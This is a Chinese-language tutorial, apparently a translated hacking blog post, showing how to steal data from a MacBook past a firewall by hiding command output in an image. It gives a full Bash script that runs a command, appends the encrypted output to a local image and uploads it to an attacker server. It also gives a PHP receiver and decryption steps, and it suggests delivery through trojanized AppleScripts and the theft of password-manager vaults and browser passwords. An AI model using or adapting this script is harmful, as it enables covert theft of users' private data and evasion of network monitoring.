如何利用图片绕过防火墙窃取数据?

  • 一种绕过防火墙的攻击方法

无需使用元数据工具即可将数据快速注入图像中。

攻击者可能会将这些图片发送到普通的文件共享网站,从而借此从 MacBook 中窃取敏感信息。

本文探讨的就是一种将数据嵌入图像的替代方法。

与使用元数据标签将有效载荷存储在图像内部的方法不同,这里探讨的方法涉及将文本直接注入图像文件的页脚中。以下是 null-byte 的演示。

了解攻击

为本文创建了一个简单的Bash脚本,以演示攻击者如何轻松地在目标Mac计算机上找到的图像中渗入数据。

该脚本在下面,GitHub 在这里

#!/bin/bash

# `if` statement to detemine if the message is a 'response' one
# This is the command being executed and embedded in the photo.
# Single-quotes are used here to help with escaping special
# characters within the desired command(s).
exfilData='ls -lah "/Users/$USER/"'

# Where the attackers PHP server is located. This needs to be
# updated to use a public domain, like Dropbox or something
# with an official API.
exfilSite="http://attacker.com/index.php"

# If no suitable image is found on the target computer, this
# image will be downloaded and used instead. By default, the
# script tries to use an image already on the MacBook to
# minimize the amount of traffic originating the device.
tmpImage="https://support.apple.com/content/dam/edam/applecare/images/en_US/repair/psp-repair_2x.png"

# The `find` command used to locate a suitable image to embed
# data into. It will check the users home (~) directory for the
# first (-print -quit) JPG, JPEG, or PNG smaller than 100k.
# The filesize maximum and filetypes are somewhat arbitrary.
# The size can be increased and the filetypes can be expanded
# to use MP3, PDF, and MOV files, for example.
findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"

# If the encryption option is enabled, the password is hardcoded
# into the payload for convenience, making it possible to
# reverse engineer and decrypt the exfiltrated data inside the
# image. This is a quick and dirty solution.
pass="password123"

# An `if` statement to detect if a suitable PNG or JPG was
# discovered. If not, it will download the backup image
# defined earlier in the script (tmpImage).
if [[ ! -f "$findImage" ]]; then
  # Curl will silently (-s) download the backup image and
  # save it (-o) into the /tmp directory with the i.jpg filename.
  curl -s "$tmpImage" -o "/tmp/i.jpg"
  # The backup image is set into the exfilImage variable for
  # later commands.
  exfilImage="/tmp/i.jpg"
else
  # If a suitable image is discovered, the exfilImage variable
  # is set for later commands.
  exfilImage="$findImage"
fi

# It may or may not be desirable to encrypt the payload output
# before embedding it into the image. Set to `1` to enable
# encryption, set to `0` to disable it.
useEncrypt='1'

# An `if` statement to determine the value of the exfilType
# variable. If `1` it will encrypt with openssl (LibreSSL).
# Otherwise, it will not encrypt.
if [[ "$useEncrypt" = '1' ]]; then
  # OpenSSL is used to encrypt (enc) the payload output
  # as well as encode (-a -A) the encrypted data with a
  # password (-pass).
  exfilData="$(openssl enc -aes-256-cbc -a -A -in <(eval $exfilData) -pass pass:$pass)"
else
  # If encryption isn't used, Bash will evaluable the variable
  # and execute it as a command.
  exfilData="$(eval $exfilData)"
fi

# Printf is used to embed the command output directly into
# image. It will append (>>) the data on a newline (\n\n).
# The newlines make it easy to quickly extract the data
# after it has been delivered to the attacker.
printf '\n\n%s' "$exfilData" >> "$exfilImage"

# Curl will exfiltrate the image to the attackers PHP
# server.
curl -F "[email protected]$exfilImage" "$exfilSite"

该脚本将首先执行任意命令(例如 system_profiler)。该命令的输出是攻击者希望窃取的数据。

然后,脚本将尝试在目标的主目录(〜/)中定位 JPEG 或 PNG 图像,并将命令的输出直接注入图片中。接着将图像立即上传(走私数据)到攻击者想要的任何网站。

以下是使用 Kali 中的 nano 文本编辑器打开的小图像文件的示例。可以看到图像产生了一些不寻常的字符,因为照片并不是要用文本编辑器打开的。

�PNG
^Z
^@^@^@
IHDR^@^@^D�^@^@^A^@^H^F^@^@^@�^Ebk^@^@^L^WiCCPICC Profile^@^@H��W^GXS�^V�[�     %�J     �A4�&%�H��FH^B  %�^T^T�
Wp-��`Y�U^Q^E�^B�Z�`a��-���ł
�7      ���}����o2?���?3瞹�^L^@�j�T��j^CP Q�^R^cXi�^Y,R^[email protected]^A^E��(`��˥���(^@������5����N*��|�_��@(�^C��A�%��^K �^K^@6�/�)^@ �A��T�T�� f$
��_c��N^U�"^RT#�ۍ��H^Uր��$+&v��B,P�U��"eD2�t^@P�/^O�^Xƺ^B^H�^P^GeI�cT��^Nb�lq^XwH^GM^P+�I_�Byh"İr�I�^d�X�$[^V�^Y���d��L�˔yɜa��"!W�O�xG$
ł^[email protected]��DS^\`w����t':��B7�6`�X'v^Pk^AAPa(/y0^[���B��gw�7����7^C�^PNS��+�PZ,^S��^T,^N��    Y\      ^?�(�^K��^[^@�7th���W^?^[^Q���6^E�k�?�$
f���^T���`^U�^A^[�&�
�^D�A^K8^@����,�^@��۠^K��g�^OV�^@� $��0^P#�^\�F^\^Q^W�^K�GB�($^AIG2�^\D�(�^Y�|�^\�@j��H=�^K�^_9��F."7�n� �
��b(^Ue���

向下滚动到同一文件的最底部,会发现一些 lssystem_profiler 命令的输出。

�^D^^�'�?^?~���P��"�f��"c�5h^@w衇F�^K��x2VS�L�P$]^D����{h�����uL^f��ia������0pݺuqg^Ha�Gg��@�G�^^����<9f^W����^O?�kH��"UC��<������f^?]^N^X0 d�"g^WZ�ǽt���?���twu�G|.��yM~�k7�C^N9$e�������?nܸ^Bg^WL���^P�^L^S��7�IW�^F�V��{�^]w�ʸ~�+W��ˤ^F��N;�����ɐW��ץ�Vg^_-,,^L�l��2�~�v����P.b�$
�Xr�^U^U^U��D���l�^Z�J^W��T����<�^D�a����g�c˝s�9[$�s�~��i(;gΜ�L(���^[kL�)o6m:���ܶ'��u�~��%G^\q�]��mk��իW�F�^^�E�kM^O^Z��[�����^Z���d�f6J��
�4a3^B^H �^@^B^H �^@^B^H ��v" èU��^E-�Z).       ��'�#I�X��jZ']F�^?�����^?����+���ꩧ��+��'T0ǹ��^[k$��|���^[������v
 ^��m�^V�i;�v��'n�9sf��Ǯ\�m�����⋷�^Ep�=۵�6�Kڥ\�s���Ž�^_���������֦f����qL;9N���B{�        'l^�dI�>Gsު����1�0f̘JS�g�a�8�Z}��V'ݐv��6�����^Epz�O>�$1y������'��:��TbV9���������t�\
�uVd����Pf�MH^X\{�q�m�e^@��*x�^@^B^H �^@^B^H �^@^B^H �@�^E���3���)��sϐt1^L�,����j��EK�5��^{��K�^N�.�I�����<^]+^Z�^F�^[��'�3yJ^ELB�!n�@�^N��F���^\\F�8Dqq�5+�tU^Nj7aG&^W���:��s]���g�]k�xA�^UW��Jp��y���X^&�h� ����\*���t�^F��~����k�{�-��[email protected]/��m� J��g�'^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]��^$
�B �{.��^P.��^\^K^A^D^[email protected]^@^A^D^[email protected]^@^A^D^P��^EZ^S�ك�o�^L�^A^B^Ht^F�^G^^x�N�:ýr�^H �^@^B^H �^@^B^H �^@^B;�@�c��8�ʝ �^@^B^H �^@^B^H �^@^B^H �^@^B^H �>^B�p���Y^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D:�^@!\'z��*^B^H �^@^B^H �^@^B^H �^@^B^H �@�^H^Pµ�;gE^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^$
�#�^@^B^H �^@^B^H �^@^B^H �^@^B^H �Q����
���g�@�nݬ�֯_^_X�[email protected]�E"^Q�H�p6^Eo^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^P�&��oZ�6dȐ���{����^e^K��8���^Wc�ys�^U^B^H �^@^B^H �^@^B^H �^@^B^H �^@^B��vA�ӧOJ^@g6j^E�n�6�E^Hg$X"�^@^B^H �^@^B^H �^@^B^H �^@^B^H �[email protected]+���-�K���q��
!\6)�#�^@^B^H �^@^B^H �^@^B^H �^@^B^H �E �L�V����UUۘ^W!��`�^@^B^H �^@^B^H �^@^B^H �^@^B^H �@^[   ^Pµ^Q,�E^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]�^H^P�^Y    �^H �^@^B^H �^@^B^H �^@^B^H �^@^B^H��^@!\^[�rX^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D�^@!��`�^@^B^H �^@^B^H �^@^B^H �^@^B^$
�b���1/^S�m[c��D^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^AW�P(^Tذa��6]�~����1/
��J*^W6+X"�^@^B^H �^@^B^H �^@^B^H �^@^B^H �@�^B�p8�r�J�j8���m�F_�dr��p���PW�B^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@��^E��Mö�^K^W^F֮]^[������u�n3�pR^@7/�H$f����*�� ���S�^B^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D��h ^^�^G�/_^^x��w,^P
 ^BN�9^3B����뺣$���_B�'^]�x�^@^B^H �^@^B^H �^@^B^H �^@^B^H �@�^W� {Qmmj
�^T�Y�[$^R      ��^Fp�μ�+��s�̙�^]S�^_^?��u=z�X!
F��C寻i�^R^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^DZ$�V·yR��Ϲs�>*{&�^[email protected]��q�2��^@^@^@^@IEND�B`�

total 80
drwx------+ 19 user  staff   608B May  3 02:22 Desktop
drwxr-xr-x+ 17 user  staff   544B May  3 01:00 .
-rw-------   1 user  staff    55B May  3 01:00 .lesshst
drwx------  59 user  staff   1.8K May  2 23:48 .bash_sessions
-rw-------   1 user  staff    23K May  2 22:17 .bash_history
[email protected]  1 user  staff   8.0K May  2 22:11 .DS_Store
drwx------   7 user  staff   224B Apr 28 06:46 .Trash
drwx------+ 33 user  staff   1.0K Apr 26 21:33 Documents
[email protected] 55 user  staff   1.7K Apr 25 06:58 Library
drwxr-xr-x  15 user  staff   480B Nov 18 11:36 .atom
drwx------+  4 user  staff   128B Nov 18 06:32 Downloads
drwx------   3 user  staff    96B Nov 18 05:51 .config
drwx------+  3 user  staff    96B Oct 29  2018 Movies
drwx------+  3 user  staff    96B Oct 29  2018 Music
drwx------+  3 user  staff    96B Oct 29  2018 Pictures
drwxr-xr-x+  4 user  staff   128B Oct 29  2018 Public
drwxr-xr-x   5 root  admin   160B Oct 29  2018 ..

Firewall:

    Firewall Settings:

      Mode: Allow all incoming connections
      Firewall Logging: Yes
      Stealth Mode: No

图像如何保留数据的技术细节超出了本文的范围。这里重要的是,图片底部的数据不会让照片看起来有任何不同。

诸如 Apple 的 Preview 之类的图像查看器将继续如常打开图像,而不会检测到图像文件中隐藏的数据

这样,就把图像变成了用于数据窃取的出色传输机制。

该脚本使用 I/O 重定向完成将数据注入到图像文件中的过程。这与使用>>运算符将数据附加到文本文件的方式非常相似,该脚本会将命令输出附加到图像文件的底部。

为什么要在图像中渗入数据?

因为这样做可以绕过防火墙。借助基于网络的防火墙解决方案,可以观察到在网络上特定设备传输的每个数据包。于是攻击者很难获取大量信息。

而在图像中走私数据有助于解决这一障碍。

Wireshark capture of an image containing exfil data being sent to an arbitrary website.

了解有效载荷

现在逐行分解一下这个脚本

它从几个变量开始,应根据情况进行适当更改。第一个变量将确定要在目标MacBook上执行的命令。该命令的输出嵌入在图像文件中。

下面的示例对目标的主目录执行一个简单的 ls 命令。单引号用于此变量,以帮助转义字符。在提出要执行的命令时要注意这一点。

exfilData='ls -lah "/Users/$USER/"'

该图像可以泄露到很多地方。在 Dropbox 和 Flickr 等网站上,存在官方 API,以使最终用户(包括攻击者)尽可能方便地上传文件。

同样,curl 可以模拟POST请求,将图像发送到文件共享网站和其他论坛。对于此演示,我们将在攻击者的系统上使用简单的PHP服务器设置。

exfilSite="http://attacker.com/index.php"

就像稍后在脚本中看到的那样,它尝试枚举可行的图像以将输出数据保存到其中。如果未找到任何东西,脚本将下载下面的图像,使用它来走私输出数据。

以下 URL 链接到一个 Apple 域的随机图像,但实际上可以是互联网上的任何 JPEG 或 PNG。

tmpImage="https://support.apple.com/content/dam/edam/applecare/images/en_US/repair/psp-repair_2x.png"

该脚本将尝试查找小于100k且包含 JPEG、JPG 或 PNG 文件扩展名的图像文件 (-type f)。

它将使用符合此条件的第一个图像作为渗透文件 (-print -quit)。

文件大小基本任意的。较小的图像文件将使上传过程更快。这些 find 的主要功能是显示如何完善条件。

findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"

该脚本支持在将命令输出数据嵌入到图像之前对其进行加密的功能。用 1 启用它,用 0 禁用它。

useEncrypt='1'

启用加密后,以下密码用于保护输出数据。为了方便起见,它被硬编码到有效负载中,这使得可以反向工程和解密图像中的渗入数据。公钥加密在这里更有意义。

pass="password123"

脚本的其余部分无需修改。以上所有变量均硬编码到以下部分中。

以下是两个 if 语句中的第一个,它将确定是否检测到合适的 JPEG 或 PNG 文件,然后在以下命令中使用它,或下载在 “tmpImage” 变量中定义的 Apple 图像。

if [[ ! -f "$findImage" ]]; then
  curl -s "$tmpImage" -o "/tmp/i.jpg"
  exfilImage="/tmp/i.jpg"
else
  exfilImage="$findImage"
fi

第二个 if 语句使用 OpenSSL(在 macOS 或 Mac OS X 中为 LibreSSL)用 $pass 来加密输出数据。否则,它将不会加密并将输出数据以纯文本格式注入到图像中。

if [[ "$useEncrypt" = '1' ]]; then
  exfilData="$(openssl enc -aes-256-cbc -a -A -in <(eval $exfilData) -pass pass:$pass)"
else
  exfilData="$(eval $exfilData)"
fi

这里有 I/O 重定向。Printf 用于将命令输出附加(>>)到图像文件中。添加了换行符(\n\n)以将注入的数据与原始图像数据分开,从而使在以下命令中更易于提取。

printf '\n\n%s' "$exfilData" >> "$exfilImage"

最后,发送图像。

curl -F "[email protected]$exfilImage" "$exfilSite"

第一步:启动PHP服务器

本文前面使用的示例利用 File.io 存储被渗透的图像。尽管类似的文件共享网站都非常适合此攻击,但这里将展示如何在 Kali 中使用本地 PHP 服务器来拦截图像。

PHP 用于拦截来自目标 MacBook 的图像。将以下 PHP 代码保存到名为 “ index.php” 的文件中,并使用 php -S 0.0.0.0:80 启动服务器。

<?php
    $file = date("dHis") . ".png";
    move_uploaded_file($_FILES['image']['tmp_name'], $file);
?>

第二步:部署有效载荷

有几种方法可以使 Mac 用户执行某些恶意代码。

破坏目标的最简单方法是对其进行社交工程设计,以诱使目标打开木马化的 AppleScripts。

这可以通过执行 USB Dead Drop 攻击来实现,macOS 极易受到该攻击或远程绕过Gatekeeper攻击。

有关 USB Dead Drop 攻击的更多信息,可以看这篇文章。它着重于损害Windows 10目标,但也深入讨论了如何使用USB闪存驱动器作为攻击媒介。

第三步:访问被窃取的数据

PHP 服务器接收到被渗透的图像后开始提取嵌入的数据。如果在有效负载中禁用了加密,则可以使用 tail 命令轻松提取里面所有数据。根据需要更改要打印的行数(-n)。

~$ tail -n 20 image.png

1   ���g�@�nݬ�֯_X�[email protected]�E"�H�[email protected]@@@�&��oZ�6dȐ���{����

��J*6+X"    �@��p8�r�J�j8���m�F_�dr��p��PW�[email protected]@@@����Mö�     ��!\[email protected]@@@�!��`    �@   ,�[email protected]@@@�        ��!\[email protected]@@@�!��`    �@   ,�[email protected]@@�q��`���1�
F��C寻i�@@@@Z$�V·yR��Ϲs�>*{&�@��q�2��IEND�B`�          ]����u�n3�pR7/�H$f���*�� ���S�@@@@��h ��/_x�w,

     2  total 80
     3  drwx------+ 19 user  staff   608B May  3 02:22 Desktop
     4  drwxr-xr-x+ 17 user  staff   544B May  3 01:00 .
     5  -rw-------   1 user  staff    55B May  3 01:00 .lesshst
     6  drwx------  59 user  staff   1.8K May  2 23:48 .bash_sessions
     7  -rw-------   1 user  staff    23K May  2 22:17 .bash_history
     8  [email protected]  1 user  staff   8.0K May  2 22:11 .DS_Store
     9  drwx------   7 user  staff   224B Apr 28 06:46 .Trash
    10  drwx------+ 33 user  staff   1.0K Apr 26 21:33 Documents
    11  [email protected] 55 user  staff   1.7K Apr 25 06:58 Library
    12  drwxr-xr-x  15 user  staff   480B Nov 18 11:36 .atom
    13  drwx------+  4 user  staff   128B Nov 18 06:32 Downloads
    14  drwx------   3 user  staff    96B Nov 18 05:51 .config
    15  drwx------+  3 user  staff    96B Oct 29  2018 Movies
    16  drwx------+  3 user  staff    96B Oct 29  2018 Music
    17  drwx------+  3 user  staff    96B Oct 29  2018 Pictures
    18  drwxr-xr-x+  4 user  staff   128B Oct 29  2018 Public
    19  drwxr-xr-x   5 root  admin   160B Oct 29  2018 ..

如果启用了加密,则必须在 Kali 中安装 OpenSSL(LibreSSL)才能解密数据。确保安装 LibreSSL 版本2.8。在本测试中 2.9.x 版本似乎与 Mojave 的 LibreSSL 版本不兼容;数据不会解密。

在 Kali 中,首先下载 LibreSSL 压缩包。

~$ wget 'https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.2.tar.gz'

--2019-04-28 21:08:46--  https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.2.tar.gz
Resolving ftp.openbsd.org (ftp.openbsd.org)... 129.128.5.191
Connecting to ftp.openbsd.org (ftp.openbsd.org)|129.128.5.191|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3373599 (3.2M) [text/plain]
Saving to: ‘libressl-2.8.2.tar.gz’

libressl-2.8.2.tar.gz             100%[==============>]   3.22M   255KB/s    in 25s

2019-04-28 21:09:15 (133 KB/s) - ‘libressl-2.8.2.tar.gz’ saved [3373599/3373599]

使用以下 tar 命令将其解压缩,以提取 (x) .gz (z) 文件(f).

~$ tar -xzf libressl-*.tar.gz

libressl-2.8.2/m4/check-hardening-options.m4
libressl-2.8.2/m4/check-libc.m4
libressl-2.8.2/m4/check-os-options.m4
libressl-2.8.2/m4/disable-compiler-warnings.m4
libressl-2.8.2/m4/libtool.m4

...

libressl-2.8.2/man/tls_load_file.3
libressl-2.8.2/man/tls_ocsp_process_response.3
libressl-2.8.2/man/tls_read.3
libressl-2.8.2/man/openssl.cnf.5
libressl-2.8.2/man/x509v3.cnf.5
libressl-2.8.2/man/Makefile.in
libressl-2.8.2/man/CMakeLists.txt

完成后,将 (cd) 更改为新的 libressl-* / 目录。

~$ cd libressl-*/

使用 ./configure 确保一切准备就绪,可以构建应用。这将需要几分钟才能完成。

~$ ./configure && make

checking build system type... x86_64-pc-linux-gnu
checking host system type... x86_64-pc-linux-gnu
checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /usr/bin/mkdir -p

...

make[1]: Entering directory '/opt/libressl-2.8.2/man'
make[1]: Nothing to be done for 'all'.
make[1]: Leaving directory '/opt/libressl-2.8.2/man'
make[1]: Entering directory '/opt/libressl-2.8.2'
make[1]: Nothing to be done for 'all-am'.
make[1]: Leaving directory '/opt/libressl-2.8.2'

然后,使用 make install 将必要的软件安装到适当的系统目录中。

~$ make install

make install
Making install in crypto
make[1]: Entering directory '/opt/libressl-2.8.2/crypto'
make  install-am
make[2]: Entering directory '/opt/libressl-2.8.2/crypto'

...

make[2]: Nothing to be done for 'install-exec-am'.
 /usr/bin/mkdir -p '/usr/local/lib/pkgconfig'
 /usr/bin/install -c -m 644 libcrypto.pc libssl.pc libtls.pc openssl.pc '/usr/local/lib/pkgconfig'
make[2]: Leaving directory '/opt/libressl-2.8.2'
make[1]: Leaving directory '/opt/libressl-2.8.2'

最后,使用 ldconfig 创建必要的链接并缓存到最新的共享库。

~$ ldconfig

要验证安装是否成功,请使用 whereis 命令查找 openssl 二进制文件。

~$ whereis openssl

openssl: /usr/bin/openssl /usr/local/bin/openssl /usr/share/man/man1/openssl.1ssl.gz

/usr/local/bin/ 中的文件是最新版本,可以使用以下 openssl 命令进行验证。

~$ /usr/local/bin/openssl version

LibreSSL 2.8.2

完成安装后,可使用以下命令提取并解密图像中的数据。

~$ /usr/local/bin/openssl enc -d -aes-256-cbc -a -A -pass pass:password123 -in <(tail -n1 image.png)

total 80
drwx------+ 19 user  staff   608B May  3 02:22 Desktop
drwxr-xr-x+ 17 user  staff   544B May  3 01:00 .
-rw-------   1 user  staff    55B May  3 01:00 .lesshst
drwx------  59 user  staff   1.8K May  2 23:48 .bash_sessions
-rw-------   1 user  staff    23K May  2 22:17 .bash_history
[email protected]  1 user  staff   8.0K May  2 22:11 .DS_Store
drwx------   7 user  staff   224B Apr 28 06:46 .Trash
drwx------+ 33 user  staff   1.0K Apr 26 21:33 Documents
[email protected] 55 user  staff   1.7K Apr 25 06:58 Library
drwxr-xr-x  15 user  staff   480B Nov 18 11:36 .atom
drwx------+  4 user  staff   128B Nov 18 06:32 Downloads
drwx------   3 user  staff    96B Nov 18 05:51 .config
drwx------+  3 user  staff    96B Oct 29  2018 Movies
drwx------+  3 user  staff    96B Oct 29  2018 Music
drwx------+  3 user  staff    96B Oct 29  2018 Pictures
drwxr-xr-x+  4 user  staff   128B Oct 29  2018 Public
drwxr-xr-x   5 root  admin   160B Oct 29  2018 ..

本文中使用的有效负载是一个基本示例。但是在实际情况下,攻击者有可能会设计脚本为离线暴力攻击者定位并泄露 LastPass 和 1Passwords 数据。

其他渗透攻击可能涉及缓存的浏览器密码、终端历史记录、Web流量,以及攻击者认为值得窃取的任何数据。⚪️

发表评论

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据